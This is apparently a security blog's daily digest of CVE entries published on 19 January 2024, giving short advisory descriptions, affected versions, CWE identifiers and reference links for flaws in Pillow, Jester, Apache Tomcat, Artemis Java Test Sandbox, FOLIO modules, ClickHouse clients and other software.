https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-3.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50447

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).

CVE ID : CVE-2023-50447
Source : cve@mitre.org
CVSS Score : /

References :
https://devhub.checkmarx.com/cve-details/CVE-2023-50447/ | source : cve@mitre.org
https://duartecsantos.github.io/2023-01-02-CVE-2023-50447/ | source : cve@mitre.org
https://github.com/python-pillow/Pillow/releases | source : cve@mitre.org


Vulnerability ID : CVE-2023-50693

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.

CVE ID : CVE-2023-50693
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/dd297786750f300a2bab3bb73fee919b | source : cve@mitre.org
https://github.com/dom96/jester/issues/326 | source : cve@mitre.org
https://github.com/dom96/jester/pull/327 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50694

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component.

CVE ID : CVE-2023-50694
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/c95e2fc1fd84d93167eb60193318d0b8 | source : cve@mitre.org
https://github.com/dom96/httpbeast/issues/95 | source : cve@mitre.org
https://github.com/dom96/httpbeast/pull/96 | source : cve@mitre.org


Vulnerability ID : CVE-2023-49329

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.

CVE ID : CVE-2023-49329
Source : cve@mitre.org
CVSS Score : /

References :
https://www.anomali.com/collaborate/ciso-blog | source : cve@mitre.org
https://www.anomali.com/security-advisory/anml-2023-01 | source : cve@mitre.org


Source : apache.org

Vulnerability ID : CVE-2024-21733

First published on : 19-01-2024 11:15:08
Last modified on : 19-01-2024 15:56:26

Description :
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

CVE ID : CVE-2024-21733
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2024/01/19/2 | source : security@apache.org
https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz | source : security@apache.org

Vulnerability : CWE-209


Source : wordfence.com

Vulnerability ID : CVE-2024-0663

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 20:15:13

Description :
Rejected reason: REJECT: This is a false positive report.

CVE ID : CVE-2024-0663
Source : security@wordfence.com
CVSS Score : /

References :


Source : vulncheck.com

Vulnerability ID : CVE-2024-0758

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.

CVE ID : CVE-2024-0758
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-23679

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.

CVE ID : CVE-2024-23679
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/issues/9253 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com

Vulnerability : CWE-384


Vulnerability ID : CVE-2024-23680

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.

CVE ID : CVE-2024-23680
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com

Vulnerability : CWE-347


Vulnerability ID : CVE-2024-23681

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23681
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-23682

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23682
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.8.0 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com

Vulnerability : CWE-501
Vulnerability : CWE-653


Vulnerability ID : CVE-2024-23683

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23683
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.7.6 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23684

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.

CVE ID : CVE-2024-23684
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com

Vulnerability : CWE-407


Vulnerability ID : CVE-2024-23685

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.

CVE ID : CVE-2024-23685
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23689

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Exposure of sensitive information in exceptions in ClichHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.

CVE ID : CVE-2024-23689
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ClickHouse/clickhouse-java/issues/1331 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/pull/1334 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2024-23686

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.

CVE ID : CVE-2024-23686
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com

Vulnerability : CWE-532


Vulnerability ID : CVE-2024-23687

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.

CVE ID : CVE-2024-23687
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23688

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.

CVE ID : CVE-2024-23688
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com

Vulnerability : CWE-323


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.